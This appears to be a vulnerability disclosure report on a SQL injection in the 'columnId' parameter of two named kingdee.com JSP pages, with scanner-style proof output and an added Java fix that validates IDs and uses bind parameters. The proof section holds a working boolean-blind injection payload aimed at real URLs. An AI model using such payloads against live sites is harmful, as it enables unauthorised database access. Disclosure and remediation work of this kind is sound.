### Brief description:
SQL injection
### Details:
1. http://cms.kingdee.com/solutions/business/manufacture/manufactureCaseList.jsp?columnId=150201301401,150202301401,150202302401,150202303401
2. http://cms.kingdee.com/solutions/business/scm/scmCaseList.jsp?columnId=151201301,151202301
### Proof of vulnerability:
```
Place: GET
Parameter: columnId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: columnId=151201301,151202301%' AND 4164=4164 AND '%'='
---
web application technology: JSP
back-end DBMS: Oracle
```
The current user is not a DBA:
```
web application technology: JSP
back-end DBMS: Oracle
current user is DBA: False
```
Database:
```
back-end DBMS: Oracle
current schema (equivalent to database on Oracle): '?숀`@x߂рw߱ߢߢ!'
```
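A remediation sketch for the `columnId` parameter, added here as an example; it is not code from the affected site, whose server-side query is not shown in this report. It assumes the parameter is only ever a comma-separated list of numeric IDs, as in the two URLs above, and that the lookup can be expressed as an `IN` list; the class, table and column names are hypothetical.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;
import java.util.regex.Pattern;

public class ColumnIdQuery {
    // Allow-list: 1 to 50 decimal IDs separated by commas (18 digits always fits in a long).
    private static final Pattern ID_LIST = Pattern.compile("\\d{1,18}(,\\d{1,18}){0,49}");

    /** Parses the raw request parameter into numeric IDs and rejects anything else. */
    static List<Long> parseColumnIds(String raw) {
        if (raw == null || !ID_LIST.matcher(raw).matches()) {
            throw new IllegalArgumentException("columnId must be a comma-separated list of numbers");
        }
        List<Long> ids = new ArrayList<>();
        for (String part : raw.split(",")) {
            ids.add(Long.parseLong(part));
        }
        return ids;
    }

    /** One bind placeholder per ID; case_list and column_id are hypothetical names. */
    static String buildSql(int count) {
        String marks = String.join(",", Collections.nCopies(count, "?"));
        return "SELECT title FROM case_list WHERE column_id IN (" + marks + ")";
    }

    /** The caller owns the returned statement and must close it. */
    static PreparedStatement prepare(Connection conn, String rawColumnId) throws SQLException {
        List<Long> ids = parseColumnIds(rawColumnId);
        PreparedStatement ps = conn.prepareStatement(buildSql(ids.size()));
        for (int i = 0; i < ids.size(); i++) {
            ps.setLong(i + 1, ids.get(i)); // values travel as binds, never as SQL text
        }
        return ps;
    }

    public static void main(String[] args) {
        // Legitimate value taken from the second URL in the report.
        System.out.println(buildSql(parseColumnIds("151201301,151202301").size()));
        try {
            // URL-decoded value of the payload shown in the proof above.
            parseColumnIds("151201301,151202301%' AND 4164=4164 AND '%'='");
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

If the real query matches `columnId` with `LIKE` rather than `IN`, the same rule applies: validate the value, then pass the pattern as a bind parameter instead of concatenating it into the statement.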